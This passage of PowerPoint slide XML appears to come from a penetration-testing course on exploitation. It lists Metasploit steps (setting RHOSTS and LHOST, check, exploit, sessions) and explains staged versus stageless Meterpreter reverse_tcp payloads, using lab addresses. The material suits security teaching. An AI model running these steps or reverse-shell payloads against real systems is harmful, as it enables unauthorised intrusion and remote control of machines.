            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Read what it does and which versions it hits</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="3300984"/>
            <a:ext cx="457200" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="701DF5"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>04</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="3246120"/>
            <a:ext cx="4572000" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>show options</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5760720" y="3273552"/>
            <a:ext cx="5852160" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>See what the module needs from you</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="3877056"/>
            <a:ext cx="457200" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="701DF5"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>05</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="3822192"/>
            <a:ext cx="4572000" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>set RHOSTS 192.168.56.101</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5760720" y="3849624"/>
            <a:ext cx="5852160" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Target. Almost always the only required option</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="4453128"/>
            <a:ext cx="457200" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="701DF5"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>06</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="4398264"/>
            <a:ext cx="4572000" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>set LHOST 192.168.56.102</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5760720" y="4425696"/>
            <a:ext cx="5852160" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Your address, for reverse payloads. Get this wrong and nothing comes back</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="5029200"/>
            <a:ext cx="457200" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="701DF5"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>07</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="4974336"/>
            <a:ext cx="4572000" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>check</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5760720" y="5001768"/>
            <a:ext cx="5852160" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Ask the target if it is vulnerable, when the module supports it</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="5605272"/>
            <a:ext cx="457200" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="701DF5"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>08</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="5550408"/>
            <a:ext cx="4572000" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5760720" y="5577840"/>
            <a:ext cx="5852160" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Run it. Same as the run command</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="6263640"/>
            <a:ext cx="11064240" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1820"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>sessions -l lists what you have, sessions -i 1 puts you back inside one, background gets you out without losing it.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="13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06 / EXPLOITATION</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Payloads: staged and stageless</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49</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1508760"/>
            <a:ext cx="5440680" cy="2148840"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2979"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="1691640"/>
            <a:ext cx="4846320" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Staged</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="2084832"/>
            <a:ext cx="4937760" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>linux/x86/meterpreter/reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="2468880"/>
            <a:ext cx="4937760" cy="1005840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Slashes between meterpreter and reverse_tcp. A tiny first stage lands, calls home and downloads the rest. Small, but it needs a second connection.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6199632" y="1508760"/>
            <a:ext cx="5440680" cy="2148840"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2979"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6473952" y="1691640"/>
            <a:ext cx="4846320" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Stageless</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6473952" y="2084832"/>
            <a:ext cx="4937760" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>linux/x86/meterpreter_reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6473952" y="2468880"/>
            <a:ext cx="4937760" cy="1005840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Underscore instead of that last slash. Everything ships at once. Bigger, but it works when the network will only allow one connection.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="3886200"/>
            <a:ext cx="5486400" cy="237744"/>
          </a:xfrm>
